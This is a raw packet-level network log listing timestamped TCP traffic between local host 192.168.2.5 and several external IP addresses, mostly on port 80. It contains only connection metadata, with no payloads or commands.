Sep 27, 2024 04:21:17.507308006 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.507308960 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507311106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507318974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507332087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507343054 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507352114 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507356882 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507364035 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507375002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507394075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507402897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.507405043 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507416964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507417917 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507430077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507436037 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.507436037 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507443905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507456064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507458925 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.507461071 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507483006 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507503033 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507921934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507934093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.507944107 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507950068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507957935 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507965088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.507967949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507983923 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.507994890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508003950 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508007050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508017063 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508017063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.508028984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.508040905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.508049011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508064032 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.508074999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.508079052 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508086920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508096933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508102894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.508102894 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.508107901 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508120060 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508125067 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508131981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508166075 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508199930 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508213997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.508217096 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:17.508225918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.508238077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.508249998 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.508260012 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.508265018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.508270979 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.508282900 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.508292913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508304119 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508304119 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.508322954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508333921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508339882 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.508339882 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.508342028 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508344889 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508357048 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508364916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508377075 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508388042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508392096 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508400917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508413076 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508414984 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508424997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508435965 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508438110 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508447886 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508459091 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508460045 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508476019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508485079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508488894 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508498907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508507013 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508512020 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508522987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508527994 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508538961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508549929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508560896 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508568048 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508572102 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508584023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508594036 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508603096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508606911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508616924 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508629084 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508629084 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508641958 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508654118 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508665085 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508666992 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508677959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508690119 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508698940 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508703947 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508711100 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.508733988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.508753061 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509135008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509146929 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509157896 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509170055 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509180069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509188890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509190083 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509200096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509236097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509248018 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509267092 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509277105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509283066 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509289026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509299040 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509305954 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509310007 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509321928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509332895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509346962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509411097 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509414911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509429932 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509440899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509450912 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509459972 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509469986 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509470940 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509481907 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509493113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509505033 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509515047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509526014 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509533882 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509533882 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509540081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509551048 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509557009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509567976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509571075 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509582996 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509591103 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509594917 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509605885 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509618044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509628057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509634972 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509639978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509651899 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509661913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509671926 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509681940 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509690046 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509701014 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509704113 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509712934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509726048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509731054 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509737968 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509748936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509759903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509763956 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.509772062 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509784937 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509794950 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509800911 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.509807110 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509816885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509826899 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509838104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509849072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509856939 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.509860039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.509872913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509882927 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509893894 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.509895086 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.509919882 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.509943008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.509943008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510368109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510380983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510390997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510405064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510416031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510426044 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510431051 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510436058 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510447979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510458946 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510468960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510482073 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510505915 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510509014 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510523081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510534048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510545015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510557890 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510581017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510703087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510715008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510724068 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510735035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510746956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510751009 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510761976 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510773897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510773897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.510787964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510798931 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510807991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510818958 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510819912 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510829926 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.510831118 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510838032 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.510848999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510859966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510864019 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.510871887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510883093 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510895967 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.510900021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510912895 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510919094 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.510926008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510937929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510943890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.510950089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510961056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510971069 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.510972023 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510983944 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.510996103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511008024 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511008978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511019945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511029959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511040926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511050940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511056900 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511063099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511073112 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511080027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511084080 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511096001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511106014 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511107922 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511118889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511128902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511128902 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511142969 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511154890 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511154890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511172056 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511189938 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511573076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511584997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511595011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511605978 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511615992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511621952 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511627913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511640072 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511651039 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511656046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511663914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511673927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511683941 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511684895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511698961 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511703014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511715889 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511723042 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511728048 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511742115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511759043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511778116 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511921883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511934996 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511945009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511955976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511965990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511970043 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.511977911 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511990070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.511990070 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512002945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512012959 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512016058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512027025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512037992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512038946 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512058973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512058973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512073994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512079000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512087107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512096882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512109041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512111902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512120962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512132883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512144089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512145996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512156010 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.512166977 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.512167931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512178898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.512191057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.512197018 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.512202978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:17.512212038 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.512216091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512227058 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.512228966 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:17.512238979 CEST	80	49725	185.215.113.117	192.168.2.5
